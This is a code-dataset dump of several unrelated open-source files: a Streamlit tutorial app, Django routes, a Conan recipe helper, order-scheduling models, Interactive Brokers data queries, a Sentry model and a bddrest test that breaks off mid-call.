Expand the sidebar to the left to see the controls we have for this app.\n\n \"\"\"\n st.code(\"\"\"\n nav = st.sidebar.selectbox(\"Choose a section\",\n (\"Getting Started\",\n \"Installing Streamlit\",\n \"Basic Functions\",\n \"Layout and Themes\",\n \"Performance\"\n \"Deploying your App\",\n \"More Resources\"))\n \"\"\",\n language=\"python\")\n\n \"\"\"\n (A word of warning... while you can put an infinite amount of things in the sidebar, if you have a lot of\n controls or text you probably want to consider another layout! See more below.)\n\n ## Columns and Grid Layout\n Columns are your go to layout option when you want to display things side by side or in a grid.\n This is a great option for displaying a lot of widgets at the top of your app or for displaying a number of charts or data next to one another.\n\n \"\"\"\n with st.echo():\n df = pd.DataFrame(\n np.random.randn(200, 3),\n columns=['a', 'b', 'c'])\n\n st.subheader(\"Widget layout example\")\n\n a1, a2, a3 = st.beta_columns(3)\n\n with a1:\n st.multiselect(\"Choose data\", [\"a\", \"b\", \"c\"])\n st.slider(\"Select value\",1,100)\n\n with a2:\n st.number_input(\"Select number\", 1,10)\n st.text_input(\"Add text\")\n\n with a3:\n st.date_input(\"Select date\")\n st.time_input(\"Pick a time\")\n\n st.subheader(\"Chart layout example\")\n\n b1, b2 = st.beta_columns((2,1)) # use this notation to specify relative widths of columns\n\n with b1:\n st.area_chart(df)\n with b2:\n st.write (df)\n\n \"\"\"\n #\n ## Themes\n You Streamlit app will default to the Light Mode you see here unless you otherwise specify a theme. While you're\n developing you can simply go to the hamburger menu in the upper right, select Settings, and then choose if you want to\n switch to Dark Mode or create your own theme by choosing various colors and fonts. You can also set the them\n directly in your config file. Here's an [example app with different themes](https://share.streamlit.io/streamlit/theming-showcase/main),\n and [documentation on changing the theme](https://docs.streamlit.io/en/stable/theme_options.html).\n \"\"\"\n\n st.image(\"images/theming.gif\")\n\n \"\"\"\n\n ## Wide Mode, Page Title, Favicons and More\n As a final customization, you can use `st.set_page_config` to change default aspects of your app like the layout (wide or centered) and the\n default state of the sidebar (auto, expanded, or collapsed). For this app we have made it wide mode with the sidebar collapsed. You can also\n use `st.set_page_config` to set a custom page title or favicon. Note that for `st.set_page_config` to work, it must be the very first Streamlit\n function that you call in your app. Here is the page configuration we use for this app:\n\n \"\"\"\n\n st.code(\"\"\"\n st.set_page_config(page_title=\"Streamlit Getting Started Guide\", initial_sidebar_state=\"collapsed\")\n \"\"\", language=\"python\")\n\n \"\"\"\n #\n Now that you have a great looking app, let's move on to improving your app's performance. 🏎\n \"\"\"\n st.button(\"Next > Performance\", on_click=on_next_click)\n \n\nif state.nav == \"🏎 App Performance\":\n \"\"\"\n # Optimizing for app performance\n Your app looks good but it also needs to load and update quickly. Streamlit apps run just like Python scripts - from top to bottom - which\n means that anytime something changes in your app, like a widget changing a value, the whole script reruns. 
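    Concretely, in a sketch like the one below (the widget and the function are illustrative), every drag of the slider re-executes the entire script from the top, expensive call included:

        n = st.slider("n", 1, 10)
        result = expensive_computation(n)  # executed again on every interaction
        st.write(result)
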
Streamlit does magic behind\n the scenes to make this run fast by default, but there are a few things you should do to help speed it up.\n\n ## @st.cache\n Any time you are loading in data, manipulating large datasets, or performing extensive computations you should think about creating a function\n and using the `@st.cache` decorator to store results in the local cache. That way the next time you call the cached function, Streamlit will\n skip executing the function and just returned the previously stored output. Which all makes your app much faster!\n\n Here is an example using ``@st.cache`:\n \"\"\"\n\n st.code(\"\"\"\n @st.cache\n def expensive_computation(a, b):\n time.sleep(2) # This makes the function take 2s to run\n return a * b\n\n a = 2\n b = 21\n res = expensive_computation(a, b)\n\n st.write(\"Result:\", res)\n\n \"\"\", language=\"python\")\n\n \"\"\"\n\n Note: `@st.cache` only works on functions. So make sure to put your data pull or computation in a function before using `@st.cache`.\n [Read more about @st.cache](https://docs.streamlit.io/en/stable/caching.html) in our documentation.\n\n ## Using buttons and forms\n Sometimes you have a lot of widgets and you want to wait until everything has been adjusted and entered before running the computation.\n In that case `st.button` and `st.beta_form` are going to be your best friends.\n\n MORE STUFF HERE\n\n ## Code clean up\n If after that your app is still running slowly, something someting about cleaning up your code for production... don't load in 10000 pandas rows....\n\n ADD IN STATE LATER ON\n\n \"\"\"\n\n \"\"\"\n #\n If you're app is running well, then now it's time to deploy and share it! 🚀\n \"\"\"\n st.button(\"Next > Deploying your app\", on_click=on_next_click)\n\n\nif state.nav == \"🚀 Deploying your App\":\n \"\"\"\n # Deploying your App\n You've made an app and now you're ready to share it. Congrats! Streamlit offers a free deployment platform called [Streamlit Sharing](https://streamlit.io/sharing)\n that you can use to deploy any public apps in a matter of minutes. Just host your app in a public GitHub repo, log in to Streamlit Sharing, and get your app deployed\n in one click! If you need secure, private deployment then try [Streamlit for Teams](https://streamlit.io/for-teams).\n\n \"\"\"\n\n st.image(\"images/deploy_large.gif\")\n\n \"\"\"\n You can also host apps yourself on your preferred platform and there are many resources online about how to containerize your app and deploy on Heroku, AWS, GCP, or Azure.\n\n Now you're all set! Click forward for more resources and happy Streamlit-ing! 🎈\n \"\"\"\n st.button(\"Next > More Resources\", on_click=on_next_click)\n\n\nif state.nav == \"🎈 More Resources\":\n \"\"\"\n # More Resources and Inspiration\n Docs\n Gallery\n Forum\n \"\"\"\n","repo_name":"kellyamanda/getting-started","sub_path":"get_started.py","file_name":"get_started.py","file_ext":"py","file_size_in_byte":14717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"9950000561","text":"from django.urls import path, include\nfrom . 
import views\n\napp_name = 'student'\n\nurlpatterns = [\n # HOME\n path('', views.index, name='index'),\n \n # EXAM\n path('exams', views.exams, name='exams'),\n path('results', views.results, name='results'),\n\n path('api/', include('student.api.urls')),\n]\n","repo_name":"SubhradeepSS/Exam_Portal","sub_path":"student/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"96"} +{"seq_id":"72869356155","text":"# from enum import Enum\nfrom conan import ConanFile\nfrom conan import tools\nfrom conan.tools.scm import Git\nfrom conan.tools.files import chdir, copy, get, apply_conandata_patches\nfrom conan.tools.layout import basic_layout\nfrom conan.tools.cmake import CMakeToolchain, CMakeDeps, CMake, cmake_layout\nfrom conan.tools.microsoft import MSBuildToolchain, MSBuild, msvs_toolset\nfrom conan.tools.env import VirtualBuildEnv, VirtualRunEnv\nfrom os.path import join\n\nimport os\nimport types\n\nclass IceProperties(object):\n def __init__(self):\n self.build_requires = []\n\nclass IceTools(object):\n def init(self):\n toolchain = None\n if self.ice_toolchain != None:\n toolchain = self.ice_toolchain\n elif self.ice_generator == \"cmake\":\n toolchain = \"cmake\"\n elif self.ice_generator == \"premake5\":\n toolchain = \"native\"\n else:\n toolchain = \"none\"\n\n self.ice_init(self.ice_generator or \"none\", toolchain)\n\n def build_requirements(self):\n if self._ice.toolchain_name == \"ninja\":\n self.tool_requires(\"ninja/[>=1.11.1 <2.0]\")\n\n if self._ice.generator_name == \"cmake\":\n self.tool_requires(\"cmake/[>=3.25.3 <4.0]\")\n if self._ice.generator_name == \"premake5\":\n self.tool_requires(\"premake-installer/5.0.0@iceshard/stable\")\n self.python_requires[\"premake-generator\"]\n\n def validate(self):\n if self.settings.build_type == None:\n raise ConanInvalidConfiguration(\"Multi configuration builds are no longer supported!\")\n\n if self.settings.compiler == \"msvc\":\n if self.settings.compiler.runtime not in [\"dynamic\", None]:\n raise ConanInvalidConfiguration(\"Only Dynamic runtimes 'MD' and 'MDd' are supported!\")\n\n def layout(self):\n self.ice_layout()\n\n def source(self):\n self.ice_source()\n\n def generate(self):\n self.ice_generate()\n\n def build(self):\n self.ice_build()\n\n def package(self):\n # Calls 'ice_package_sources' with a specialized copy method\n if chdir(self, self.source_folder):\n def CopyFromSource(self, pattern, src, dst, excludes=None, keep_path=False):\n copy(self, pattern, src=join(self.source_folder, src), dst=join(self.package_folder, dst), excludes=excludes, keep_path=keep_path)\n self.ice_copy = types.MethodType(CopyFromSource, self)\n self.ice_package_sources()\n del self.ice_copy\n else:\n self.output.error(\"Failed to enter source folder!\")\n\n # Calls 'ice_package_artifacts' with a specialized copy method\n if chdir(self, self.build_folder):\n def CopyFromBuild(self, pattern, src, dst, excludes=None, keep_path=False):\n copy(self, pattern, src=join(self.build_folder, src), dst=join(self.package_folder, dst), excludes=excludes, keep_path=keep_path)\n self.ice_copy = types.MethodType(CopyFromBuild, self)\n self.ice_package_artifacts()\n del self.ice_copy\n else:\n self.output.error(\"Failed to enter build folder!\")\n\n # Iceshard method implementations\n def _ice_final_toolchain(self):\n if self.ice_toolchain == \"native\":\n if self.settings.compiler == \"msvc\":\n return \"msbuild\"\n else:\n return \"makefile\"\n 
else:\n return self.ice_toolchain\n\n def ice_init(self, generator, toolchain):\n self._ice = IceProperties()\n self._ice.toolchain_name = toolchain\n\n # Set the generator name if it's known\n if generator == None or generator == \"none\":\n self._ice.generator_name = \"none\"\n elif generator == \"premake5\":\n self._ice.generator_name = generator\n elif generator == \"cmake\":\n self._ice.generator_name = generator\n else:\n self.output.error(\"Unknown project generator\")\n\n def ice_layout(self, generator=None):\n if generator == None:\n generator = self._ice.generator_name\n\n if generator == \"cmake\":\n cmake_layout(self)\n else:\n basic_layout(self)\n\n # Override some specific folders\n self.folders.source = \"{}-{}\".format(self.name, self.version)\n\n if generator == \"premake5\":\n self.folders.generators = self.folders.source\n self.folders.build = self.folders.source\n\n def ice_source_key(self, version):\n return version\n\n def ice_apply_patches(self):\n apply_conandata_patches(self)\n\n # for patch in self.conan_data.get(\"patches\", { }).get(self.ice_source_key(self.version), []):\n # tools.patch(base_path=base_path, patch_file=\"{}/{}\".format(self.build_folder, patch[\"patch_file\"]))\n\n def ice_source(self):\n source_info = self.conan_data[\"sources\"][self.ice_source_key(self.version)]\n if \"branch\" in source_info:\n git = Git(self)\n git.clone(source_info[\"url\"], target=\".\")\n git.checkout(source_info[\"branch\"])\n if \"commit\" in source_info:\n git.checkout(source_info[\"commit\"])\n elif \"tag\" in source_info:\n git = Git(self)\n git.clone(source_info[\"url\"], target=\".\")\n git.checkout(source_info[\"tag\"])\n else:\n get(self, **source_info)\n\n # Apply patches if any\n self.ice_apply_patches()\n\n def ice_generate(self, generator=None, toolchain=None):\n if generator == None:\n generator = self._ice.generator_name\n if toolchain == None:\n toolchain = self._ice_final_toolchain()\n\n if generator == \"cmake\":\n # TODO: assert toolchain == 'cmake'\n\n if toolchain == \"ninja\":\n toolchain = CMakeToolchain(self, \"Ninja\")\n else:\n toolchain = CMakeToolchain(self)\n deps = CMakeDeps(self)\n\n self.ice_generate_cmake(toolchain, deps)\n\n toolchain.generate()\n deps.generate()\n\n if generator == \"premake5\":\n PremakeDeps = self.python_requires[\"premake-generator\"].module.PremakeDeps\n deps = PremakeDeps(self)\n self.ice_generate_premake(deps)\n deps.generate()\n\n # Generates premake5 binary env\n ms = VirtualBuildEnv(self)\n ms.vars().save_script('iceshard_tools')\n\n premake_generators_vstudio = {\n \"11\": \"vs2012\",\n \"12\": \"vs2013\",\n \"14\": \"vs2015\",\n \"15\": \"vs2017\",\n \"16\": \"vs2019\",\n \"17\": \"vs2022\",\n }\n\n # Build commandline arguments\n premake_action = \"gmake2\"\n if self.settings.compiler == \"msvc\":\n premake_action = premake_generators_vstudio.get(str(self.settings.compiler.version), \"vs2022\")\n\n premake_commandline = \"premake5 {} --file={}\".format(premake_action, join(self.source_folder, \"premake5.lua\"))\n premake_commandline += \" --arch={}\".format(self.settings.arch)\n for key, value in self.options.items():\n if value == 'True':\n premake_commandline += \" --{}\".format(key)\n elif value != 'False':\n premake_commandline += \" --{}={}\".format(key, value)\n\n # Generate premake5 projects\n self.run(premake_commandline, env=['iceshard_tools'])\n\n if toolchain == \"msbuild\":\n toolchain = MSBuildToolchain(self)\n self.ice_toolchain_msbuild(toolchain)\n toolchain.generate()\n\n def ice_build(self, 
toolchain=None):\n pass\n\n ##\n # Specific generator functions\n ##\n def ice_generate_cmake(self, toolchain, deps):\n pass\n def ice_generate_premake(self, deps):\n pass\n def ice_toolchain_msbuild(self, deps):\n pass\n\n ##\n # Called by IceTools when packagin sources and artifacts\n ##\n def ice_package_sources(self):\n pass\n\n def ice_package_artifacts(self):\n pass\n\n ##\n # Methods used to call build systems\n ##\n def ice_run_msbuild(self, solution, target=None, retarget=False):\n msbuild_platforms = {\n \"x86\": \"Win32\",\n \"x86_64\": \"x64\",\n }\n\n cmdline = \"msbuild {} /p:Configuration={} /p:Platform={}\".format(solution, self.settings.build_type, msbuild_platforms.get(str(self.settings.arch), None))\n if target != None:\n cmdline += \" /target:{}\".format(target)\n if retarget:\n cmdline += \" /p:PlatformToolset={}\".format(msvs_toolset(self))\n self.run(cmdline)\n # msbuild = MSBuild(self)\n # msbuild.build(solution, targets=targets)\n\n def ice_run_cmake(self, variables=[], target=None):\n cmake = CMake(self)\n cmake.configure(variables=variables)\n cmake.build(target=target)\n\n def ice_run_make(self, target=None, build_type=None):\n if build_type == None:\n build_type = self.settings.build_type\n\n self.run(\"make -f Makefile config={} {}\".format(str(build_type).lower(), \"\" if target == None else target), env=[])\n\n##\n## Conan package class.\nclass ConanIceshardTools(ConanFile):\n name = \"conan-iceshard-tools\"\n version = \"0.9.1\"\n user = \"iceshard\"\n channel = \"stable\"\n","repo_name":"iceshard-engine/conan-recipes","sub_path":"recipes/conan-iceshard-tools/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":9401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"41320250670","text":"import ipaddress\n\ndef convert_ip_asn(host_ip):\n \"\"\"\n 引数で受け取ったホストIPアドレスをAS番号に変換する関数\n \"\"\"\n # 基底となる4octet ASN\n base_asn = 4200000000\n\n # 入力したIPを32bitバイナリに変換し下位3オクテット(9bit目から)を10進数変換\n convert_ip = int(format(int(ipaddress.IPv4Address(host_ip)),'032b')[8:], 2)\n\n # ASNの算出\n return base_asn + convert_ip\n\n# 変換対象のIP addressを入力\ninput_ip = input('Input IP Address: ')\n\nprint('AS Number: ' + str(convert_ip_asn(input_ip)))\n","repo_name":"markunet/Python3_Junk_Files","sub_path":"ip_to_asn.py","file_name":"ip_to_asn.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"71941777915","text":"from utils import ORDERS, ORDER, PRODUCT, LINES, WORKER, WORKERS\nimport numpy as np\nimport pulp\n\n###############################################\n# Models for Problem 1 #\n###############################################\n\ndef meonf(orders:ORDERS):\n \"\"\"\n Min Excpeted Overtime Numbers First\n \"\"\"\n num_orders = len(orders.orders_dict)\n finished = 0\n time = 0\n \n deadline_orders = dict()\n added = dict()\n for order in orders.orders_dict.values():\n if order.deadline not in deadline_orders.keys():\n added[order.deadline] = False\n deadline_orders[order.deadline] = list()\n deadline_orders[order.deadline].append(order)\n \n deadlines = sorted(deadline_orders) \n nums_ddl = len(deadlines)\n cur_deadline = deadlines[0]\n if nums_ddl > 1:\n next_ddl_id = 1\n next_deadline = deadlines[next_ddl_id]\n orders_cache = deadline_orders[cur_deadline]\n \n orders_cache: list()\n while(finished != num_orders):\n # action for next deadline coming\n flag = True\n for order in orders_cache:\n if 
order.finished == False:\n flag = False \n if time > cur_deadline or flag:\n if next_deadline != -1 and added[next_deadline] == False:\n added[next_deadline] = True\n cur_deadline = next_deadline\n next_ddl_id += 1\n next_deadline = deadlines[next_ddl_id] if next_ddl_id < nums_ddl else -1\n for order in deadline_orders[cur_deadline]:\n orders_cache.append(order)\n\n # find the order to achieve the minimal expected overtime numbers\n order_id = None\n min_overtime_nums = None\n min_sum_time = None\n \n for order in orders_cache:\n order: ORDER\n if order.finished:\n continue\n vir_time = time + order.sum_time\n nums = cal_overtime_nums(orders_cache, vir_time)\n \n if min_overtime_nums is None or nums < min_overtime_nums:\n min_overtime_nums = nums\n order_id = order.id\n min_sum_time = order.sum_time\n elif nums == min_overtime_nums and min_sum_time > order.sum_time:\n order_id = order.id\n min_sum_time = order.sum_time \n \n order = orders.orders_dict[order_id]\n order: ORDER\n \n # begin work\n time = order.begin_order(time)\n finished += 1\n \n return orders \n\n\ndef cal_overtime_nums(orders_cache, vir_time):\n nums = 0\n for order in orders_cache:\n order: ORDER\n if order.finished:\n continue\n if order.deadline < vir_time:\n nums += 1\n return nums\n\n\ndef dmsf(orders: ORDERS):\n \"\"\"\n Dealine & Min Sum Time First\n \"\"\"\n num_orders = len(orders.orders_dict)\n finished = 0\n time = 0\n \n while(finished != num_orders):\n min_deadline = None\n min_sum_time = None\n order_id = None\n for id, order in orders.orders_dict.items():\n order: ORDER\n if order.finished:\n continue\n if min_deadline is None or min_deadline > order.deadline:\n min_deadline = order.deadline\n min_sum_time = order.sum_time\n order_id = id\n elif min_deadline == order.deadline and min_sum_time > order.sum_time:\n min_sum_time = order.sum_time\n order_id = id\n \n order = orders.orders_dict[order_id]\n order: ORDER\n # begin work\n time = order.begin_order(time)\n finished += 1\n return orders\n\n\ndef msf(orders: ORDERS):\n \"\"\"\n Min Sum Time First\n \"\"\"\n num_orders = len(orders.orders_dict)\n finished = 0\n time = 0\n \n while(finished != num_orders):\n # find the minimal remaining time's order\n min_sum_time = None\n order_id = None\n for id, order in orders.orders_dict.items():\n order: ORDER\n if order.finished:\n continue\n if min_sum_time is None or min_sum_time > order.sum_time:\n min_sum_time = order.sum_time\n order_id = id\n order = orders.orders_dict[order_id]\n order: ORDER\n # begin work\n time = order.begin_order(time)\n finished += 1\n return orders\n\n\ndef derf(orders: ORDERS):\n \"\"\"\n Dealine & Earliest Remaining Time First\n \"\"\"\n num_orders = len(orders.orders_dict)\n finished = 0\n time = 0\n \n while(finished != num_orders):\n # find the minimal remaining time's order\n min_deadline = None\n min_rm_time = None\n order_id = None\n for id, order in orders.orders_dict.items():\n order: ORDER\n if order.finished:\n continue\n if min_deadline is None or min_deadline > order.deadline:\n min_deadline = order.deadline\n min_rm_time = order.sum_time\n order_id = id\n elif min_deadline == order.deadline and min_rm_time > order.rm_time:\n min_rm_time = order.sum_time\n order_id = id\n \n order = orders.orders_dict[order_id]\n order: ORDER\n # begin work\n time = order.begin_order(time)\n finished += 1\n return orders\n\n\ndef erf(orders: ORDERS):\n \"\"\"\n Earliest Remaining Time First\n \"\"\"\n num_orders = len(orders.orders_dict)\n finished = 0\n time = 0\n \n while(finished != 
num_orders):\n # find the minimal remaining time's order\n min_rm_time = None\n order_id = None\n for id, order in orders.orders_dict.items():\n order: ORDER\n if order.finished:\n continue\n if min_rm_time is None or min_rm_time > order.rm_time:\n min_rm_time = order.rm_time\n order_id = id\n order = orders.orders_dict[order_id]\n order: ORDER\n # begin work\n time = order.begin_order(time)\n finished += 1\n return orders\n\n\n###############################################\n# Models for Problem 2 #\n###############################################\n\ndef lip(work_num, workers, times):\n \"\"\"\n Linear Integer Programming\n \"\"\"\n ots = times / np.sum(times)\n # create problem\n problem = pulp.LpProblem(\"Worker Allocation\", pulp.LpMaximize)\n # target\n x = [[pulp.LpVariable(f\"x_{i}_{j}\", lowBound=0, upBound=1, cat=pulp.LpInteger) for j in range(12)] for i in range(20)]\n # object\n object = pulp.lpSum(ots[j] * x[i][j] * workers[i][j] for i in range(20) for j in range(12))\n problem += object\n # constraint\n for i in range(20):\n problem += pulp.lpSum(x[i][j] for j in range(12)) <= 1\n for j in range(12):\n problem += pulp.lpSum(x[i][j] for i in range(20)) <= work_num[j] \n # get result\n problem.solve()\n result = np.zeros(shape=(20, 12))\n for i in range(20):\n for j in range(12):\n result[i][j] = pulp.value(x[i][j]) \n return result \n\n\n###############################################\n# Models for Problem 3 #\n###############################################\n\n","repo_name":"heatingma/MathorCup-2023C","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7388,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"26033542835","text":"import json\nimport numpy as np\nimport pandas as pd\n\nimport marksman_db as mdb\nimport marksman_extras as me\nimport postgresql_db as db\n\n\nfrom datetime import datetime, timedelta, date\nfrom ib_insync import util, Stock\nfrom itertools import product\nfrom math import floor, ceil\nfrom tzlocal import get_localzone\nfrom uuid import uuid4\n\nfrom marksman_objects import Ticker\nfrom postgresql_db import conn as SQLconn\n\n\n\n\n\n# IB TWS query:\ndef ticker_historical_data(ib, ticker: Ticker, startDate, endDate, barSizeSet,\n whatToShow: float='TRADES', useRTH=True,\n timeout:float=600, **kwargs):\n contract = Stock(ticker.symbol, ticker.exchange, ticker.currency)\n barSizeSet = me.bars_size(barSizeSet)\n if not endDate: endDateDT = datetime.now(startDate.tzinfo)\n else: endDateDT = endDate\n return ib.reqHistoricalData(contract, endDateTime=endDate,\n durationStr=me.duration(endDateDT-startDate, **kwargs),\n barSizeSetting=barSizeSet, whatToShow=whatToShow,\n useRTH=useRTH, timeout=timeout)\n\n\n# query from IB TWS amd convert to pandas dataframe:\ndef ticker_historical_data_trades_populate_db(ib, tickers, barSizes, startDate,\n endDate, uploader, useRTH=None):\n day = timedelta(days=1)\n for barsSize in barSizes:\n barSizeStr = me.bars_size(barsSize)\n barSizeTD = me.td_parser(barSizeStr)\n if useRTH is None:\n if barSizeTD <= timedelta(minutes=30):\n useRTH, ORTH = False, ''\n else:\n useRTH, ORTH = True, ''\n else:\n if useRTH or barSizeTD <= timedelta(minutes=30):\n ORTH = ''\n else:\n ORTH = '_ORTH'\n\n for ticker in tickers:\n bars = ticker_historical_data(ib, Ticker(symbol=ticker), startDate,\n endDate, barsSize, useRTH=useRTH,\n timeout=60000000)\n df = util.df(bars)\n df['ib_is_date'] = df['date']\n # print(df)\n if np.issubdtype(df.dtypes[0], 
np.object):\n if isinstance(df.loc[0, 'date'], date):\n df['date'] = df['date'].map(lambda x: datetime \\\n .combine(x, datetime.min.time())).dt \\\n .tz_localize('America/New_York', ambiguous='infer',\n nonexistent='shift_backward')\n\n if barSizeTD >= timedelta(weeks = 1):\n df['date'] = df['date'].shift(periods=1)\n df.drop(labels=0, inplace=True)\n elif np.issubdtype(df.dtypes[0], np.datetime64):\n df['date'] = me.to_timezone(df['date'], get_localzone())\n\n df['ny_date'] = df['date'].dt.tz_convert('America/New_York').dt.tz_localize(None)\n df['volume'] = df['volume'].map(lambda x: x*100)\n widths = df['date'].diff().shift(periods=-1)\n last = df['date'].iloc[-1]\n widths.iloc[-1] = min(me.to_timezone(datetime.now(), me.get_timezone(last)) - last,\n barSizeTD)\n df['duration'] = widths.map(lambda x: [x, barSizeTD][[x, barSizeTD].index(min(x, barSizeTD))]).map(lambda x: x.total_seconds())\n\n if barSizeTD > day:\n xSeconds = 365 * 24 * 3600\n elif barSizeTD == day:\n xSeconds = 51 * 5 * 24 * 3600\n elif barSizeTD < day:\n xSeconds = 51 * 5 * 6.5 * 3600\n df['close-open'] = df['close'] - df['open']\n df['high-low'] = df['high'] - df['low']\n df['percent'] = df['close-open'] / df['open']\n df['percent_high-low'] = 2 * df['high-low'] / (df['high'] + df['low'])\n df['percent_year'] = xSeconds * df['percent'] / df['duration']\n df['money_moved'] = df['average'] * df['volume']\n df['close-open_volume'] = df['close-open'] * df['volume']\n df.set_index(['date'], inplace=True)\n print(tuple(df.index.names))\n print(df.dtypes)\n print(df)\n uploader(f'{ticker}_{barSizeStr}{ORTH}', df)\n","repo_name":"Mixelll/Marksman","sub_path":"marksman_ib_queries.py","file_name":"marksman_ib_queries.py","file_ext":"py","file_size_in_byte":4281,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"23906436071","text":"from django.db import models\nfrom django.utils import timezone\nfrom django.utils.translation import ugettext_lazy as _\nfrom sentry.db.models import BoundedPositiveIntegerField, Model, FlexibleForeignKey, sane_repr\n\n\nclass GroupResolution(Model):\n \"\"\"\n Describes when a group was marked as resolved.\n \"\"\"\n\n __core__ = False\n\n class Type:\n in_release = 0\n in_next_release = 1\n\n class Status:\n pending = 0\n resolved = 1\n\n group = FlexibleForeignKey(\"sentry.Group\", unique=True)\n # the release in which its suggested this was resolved\n # which allows us to indicate if it still happens in newer versions\n release = FlexibleForeignKey(\"sentry.Release\")\n type = BoundedPositiveIntegerField(\n choices=((Type.in_next_release, \"in_next_release\"), (Type.in_release, \"in_release\")),\n null=True,\n )\n actor_id = BoundedPositiveIntegerField(null=True)\n datetime = models.DateTimeField(default=timezone.now, db_index=True)\n status = BoundedPositiveIntegerField(\n default=Status.pending,\n choices=((Status.pending, _(\"Pending\")), (Status.resolved, _(\"Resolved\"))),\n )\n\n class Meta:\n db_table = \"sentry_groupresolution\"\n app_label = \"sentry\"\n\n __repr__ = sane_repr(\"group_id\", \"release_id\")\n\n @classmethod\n def has_resolution(cls, group, release):\n \"\"\"\n Determine if a resolution exists for the given group and release.\n\n This is used to suggest if a regression has occurred.\n \"\"\"\n try:\n res_type, res_release, res_release_datetime = (\n cls.objects.filter(group=group)\n .select_related(\"release\")\n .values_list(\"type\", \"release__id\", \"release__date_added\")[0]\n )\n except IndexError:\n return 
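The bar-processing code above derives per-bar features from IB OHLC data: absolute and relative moves, a crude annualization that scales the per-bar percent by trading-seconds-per-year over the bar's duration, and money moved. One modernization note: `np.object` (used in the dtype check above) has been deprecated since NumPy 1.20 and removed in 1.24; plain `object` works in `np.issubdtype`. The feature columns in isolation, on a hand-made DataFrame:

```python
import pandas as pd

df = pd.DataFrame({
    "open":  [100.0, 102.0, 101.5],
    "high":  [103.0, 104.0, 102.5],
    "low":   [ 99.5, 101.0, 100.5],
    "close": [102.0, 101.5, 102.2],
    "volume": [1200, 800, 950],
    "duration": [86400.0] * 3,     # seconds covered by each bar (daily bars)
})

x_seconds = 51 * 5 * 24 * 3600     # trading seconds/year used above for daily bars

df["close-open"] = df["close"] - df["open"]
df["high-low"] = df["high"] - df["low"]
df["percent"] = df["close-open"] / df["open"]
df["percent_high-low"] = 2 * df["high-low"] / (df["high"] + df["low"])
df["percent_year"] = x_seconds * df["percent"] / df["duration"]  # annualized move
print(df[["percent", "percent_year"]])
```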
False\n\n # if no release is present, we assume we've gone from \"no release\" to \"some release\"\n # in application configuration, and thus this must be older\n if not release:\n return True\n\n if res_type in (None, cls.Type.in_next_release):\n if res_release == release.id:\n return True\n elif res_release_datetime > release.date_added:\n return True\n return False\n elif res_type == cls.Type.in_release:\n if res_release == release.id:\n return False\n if res_release_datetime < release.date_added:\n return False\n return True\n else:\n raise NotImplementedError\n","repo_name":"imfht/djangoapps","sub_path":"sentry-master/src/sentry/models/groupresolution.py","file_name":"groupresolution.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"95"} +{"seq_id":"8835041180","text":"def create_master_menu(menus):\n \"\"\"\n Given an array of foodtruck menus where each menu is an array of dishes served, \n return one array which contains all items that will be served at the festival, \n without duplicates.\n \"\"\"\n master_menu = []\n def unpack_menu(menu, master_menu):\n for item in menu:\n master_menu.append(item)\n \n for menu in menus:\n unpack_menu(menu, master_menu)\n \n return set(master_menu)\n\ntest = create_master_menu([[\"calzone\", \"pizza\", \"pasta\"], [\"pizza\", \"caesar salad\"], [\"caesar salad\", \"green salad\", \"greek salad\"]])\nprint(test)","repo_name":"vega-polaris/Algos","sub_path":"javascript_challenges/food_trucks.py","file_name":"food_trucks.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"990541273","text":"from bddrest import status, response, when, Update\n\nfrom .helpers import LocalApplicationTestCase, oauth_mockup_server\nfrom dolphin.models import Member, Tag, Organization, OrganizationMember\n\n\nclass TestTag(LocalApplicationTestCase):\n\n @classmethod\n def mockup(cls):\n session = cls.create_session()\n\n cls.member1 = Member(\n title='First Member',\n email='member1@example.com',\n access_token='access token 1',\n phone=123456789,\n reference_id=1,\n )\n session.add(cls.member1)\n\n cls.member2 = Member(\n title='seconde Member',\n email='member2@example.com',\n access_token='access token 2',\n phone=123456788,\n reference_id=2,\n )\n session.add(cls.member2)\n\n cls.organization1 = Organization(\n title='first-organization',\n )\n session.add(cls.organization1)\n\n cls.organization2 = Organization(\n title='second-organization',\n )\n session.add(cls.organization2)\n session.flush()\n\n organization_member1 = OrganizationMember(\n organization_id=cls.organization1.id,\n member_id=cls.member1.id,\n role='owner',\n )\n session.add(organization_member1)\n\n organization_member2 = OrganizationMember(\n organization_id=cls.organization2.id,\n member_id=cls.member2.id,\n role='owner',\n )\n session.add(organization_member2)\n\n cls.tag1 = Tag(\n title='already exist',\n organization_id=cls.organization1.id,\n )\n session.add(cls.tag1)\n\n cls.tag2 = Tag(\n title='second tag',\n organization_id=cls.organization1.id,\n )\n session.add(cls.tag2)\n session.commit()\n\n def test_update(self):\n self.login(\n email=self.member1.email,\n organization_id=self.organization1.id\n )\n title = 'first tag'\n description = 'A description for tag'\n\n with oauth_mockup_server(), self.given(\n f'Updating a tag',\n f'/apiv1/tags/id: {self.tag1.id}',\n f'UPDATE',\n json=dict(\n 
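`create_master_menu` above promises "one array ... without duplicates" but actually returns a `set`, which loses insertion order, and routes the flattening through a nested `unpack_menu` helper that just appends in a loop. A sketch that keeps first-seen order and returns an actual list, using `dict.fromkeys` (insertion-ordered since Python 3.7) for de-duplication:

```python
def create_master_menu(menus):
    """Flatten menus into one list of dishes, keeping first-seen order."""
    all_items = (item for menu in menus for item in menu)  # flatten
    return list(dict.fromkeys(all_items))                  # de-dupe, keep order

print(create_master_menu([
    ["calzone", "pizza", "pasta"],
    ["pizza", "caesar salad"],
    ["caesar salad", "green salad", "greek salad"],
]))
# ['calzone', 'pizza', 'pasta', 'caesar salad', 'green salad', 'greek salad']
```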
